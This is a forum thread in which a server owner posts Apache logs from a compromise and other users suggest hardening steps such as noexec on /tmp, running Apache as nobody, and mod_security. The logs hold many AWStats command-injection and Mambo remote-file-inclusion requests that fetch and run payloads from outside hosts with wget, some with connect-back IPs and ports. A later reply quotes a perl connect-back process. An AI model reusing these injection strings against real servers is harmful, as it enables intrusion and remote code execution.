216.72.4.139 - - [07/Feb/2006:20:31:46 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

217.151.96.164 - - [09/Feb/2006:03:24:43 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://161.58.46.248/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%2071.134.139.37%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 270

217.151.96.164 - - [09/Feb/2006:03:24:44 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://161.58.46.248/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%2071.134.139.37%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 269

217.151.96.164 - - [09/Feb/2006:03:24:45 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://161.58.46.248/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%2071.134.139.37%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 276

217.151.96.164 - - [09/Feb/2006:03:24:46 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://161.58.46.248/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%2071.134.139.37%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 274

12.36.175.159 - - [09/Feb/2006:20:11:28 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

12.36.175.159 - - [09/Feb/2006:20:11:29 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

12.36.175.159 - - [09/Feb/2006:20:11:30 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

206.173.28.253 - - [11/Feb/2006:07:40:09 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 276

206.173.28.253 - - [11/Feb/2006:07:40:10 -0800] "GET /cache/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 276

206.173.28.253 - - [11/Feb/2006:07:40:11 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 270

206.173.28.253 - - [11/Feb/2006:07:40:12 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 269

207.44.242.81 - - [11/Feb/2006:13:28:00 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

207.44.242.81 - - [11/Feb/2006:13:28:02 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

207.44.242.81 - - [11/Feb/2006:13:28:03 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

81.73.247.155 - - [11/Feb/2006:16:18:07 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%20202.155.79.13%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 270

81.73.247.155 - - [11/Feb/2006:16:18:09 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%20202.155.79.13%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 269

81.73.247.155 - - [11/Feb/2006:16:18:11 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%20202.155.79.13%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 276

81.73.247.155 - - [11/Feb/2006:16:18:13 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%20202.155.79.13%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 274

204.83.56.144 - - [12/Feb/2006:03:01:28 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

204.83.56.144 - - [12/Feb/2006:03:01:29 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

204.83.56.144 - - [12/Feb/2006:03:01:30 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

65.222.97.189 - - [12/Feb/2006:10:47:32 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

65.222.97.189 - - [12/Feb/2006:10:47:33 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

65.222.97.189 - - [12/Feb/2006:10:47:34 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

195.49.161.209 - - [12/Feb/2006:10:54:34 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%20202.155.79.13%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 270

195.49.161.209 - - [12/Feb/2006:10:54:35 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[optio

----------

## Sunthief

sorry guess those results were a little too long for the post.  anyway heres the confirmation that awstats hasnt been installed (as fare as I can tell!)

```
sunsquared /var/log/apache2 $ emerge -s awstats

Searching...   

[ Results for search key : awstats ]

[ Applications found : 1 ]

 

*  net-www/awstats [ Masked ]

      Latest version available: 6.5

      Latest version installed: [ Not Installed ]

      Size of downloaded files: 949 kB

      Homepage:    http://awstats.sourceforge.net/

      Description: AWStats is short for Advanced Web Statistics.

      License:     GPL-2

```

----------

## Sunthief

Heres one that looks particulally interesting:

```
61.66.208.16 - - [15/Jan/2006:02:35:08 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20200.207.91.25/bash;chmod%20744%20bash;./bash;0209.61.187.106%208080;08080;0;echo%20YYY;echo|  HTTP/1.1" 404 274

```

Looks like hes trying to set the absolut path to his own site then run scripts to do god knows what???  Whats else can I do beside updateing software that can help prevent this kind of stuff from happening??

I also did a locate for awstats

```
sunsquared /var/log/apache2 $ locate awstats   

/usr/portage/net-www/awstats

/usr/portage/net-www/awstats/awstats-6.3-r2.ebuild

/usr/portage/net-www/awstats/awstats-6.4.ebuild

/usr/portage/net-www/awstats/metadata.xml

/usr/portage/net-www/awstats/Manifest

/usr/portage/net-www/awstats/ChangeLog

/usr/portage/net-www/awstats/files

/usr/portage/net-www/awstats/files/postinst-en.txt

/usr/portage/net-www/awstats/files/digest-awstats-6.3-r2

/usr/portage/net-www/awstats/files/awstats-6.3-CAN-2005-0363.diff

/usr/portage/net-www/awstats/files/digest-awstats-6.4

/usr/portage/net-www/awstats/files/awstats-6.3-gentoo.diff

/usr/portage/net-www/awstats/files/digest-awstats-6.5

/usr/portage/net-www/awstats/awstats-6.5.ebuild

/usr/portage/metadata/cache/net-www/awstats-6.4

/usr/portage/metadata/cache/net-www/awstats-6.3-r2

/usr/portage/metadata/cache/net-www/awstats-6.5

/var/cache/edb/dep/usr/portage/net-www/awstats-6.3-r2

/var/cache/edb/dep/usr/portage/net-www/awstats-6.4

/var/cache/edb/dep/usr/portage/net-www/awstats-6.5

```

----------

## Sunthief

Ok the most popular version of phpbb that I have on my server is :

v 1.99.2.3 2004/07/11

but that just looks like the index.php file version, the directory is in phpbb2, which points to the newish version that they have now.  I dont want to start up apache again and look at what version it says, so is there another way to find the version??

----------

## Noyan

u hacked cuz of phpBB remote code exec exploit.U can see perl command exec as apache..

probably (%99) script kiddie uploaded exploit code via upload (avatar upload etc any kind of this ) and rename to orginal via remote code exec

----------

## Sunthief

So I take it the exec exploit has been fixed in future versions.  My question is then where can I find logs that confirm that it was phpbb that was the security hole?  I really want to make sure that I am fixing the problem before I put the websites back up.  Thanks

----------

## Noyan

add noexec to /tmp first

run apache as nobody

use chroot env for apache

and 

use snort

----------

## Sunthief

Thanks so much for the sudgestions, unfortionetly it appears that both noexec & snort are written to work on sparc systems like mine, but both look very usefull, I might use them at work.  

So I guess I'm limited to trying to run apache as nobody and maybe a chroot env, do u think that these two solutions alone will stop my issue?  I guess there's only one way to find out   :Rolling Eyes: 

----------

## Noyan

first sorry for my bad english..Let me explain more

If you run apache as user "nobody",all commands (talkin about remote exec commands) will run as nobody so when someone attempts to exec a remote code via apache (example rm -rf / :p ),they cannot delete or cp anything. (permissions)

With snort + auto iptables ( look for snort howto in official site ) What you can do ?

You can stop DOS (yeah really u can stop  :Very Happy:  ) or if you can write fingerprint u can solve your solution (phpBB )

But i prefer mod_security for apache..

apache   26013  0.0  0.0   2832  1464 ?        S    01:20   0:00 sh -c perl /tmp/mata.txt 217.146.91.1 50000 2>&1 3>&1 

u see this ?

Let me simulate this action (with noexec in /tmp)

$sh -c perl /tmp/mata.txt 217.146.91.1 50000 2>&1 3>&1 

Permission denied...

Script kiddie  should search another place to write and exec this code now.

etc

----------

## adelante

I wrote this a while back, you mind find it useful:

http://www.systemshock.co.za/forums/index.php?showtopic=3163

----------

## Sunthief

Thank you very much!  That looks like it stopped exec in the /tmp directory and would of saved me earlier!! My question is, do I need to start that each time the system starts up??  It seems like something I would have to add to my fstab??  Thanks again!

----------

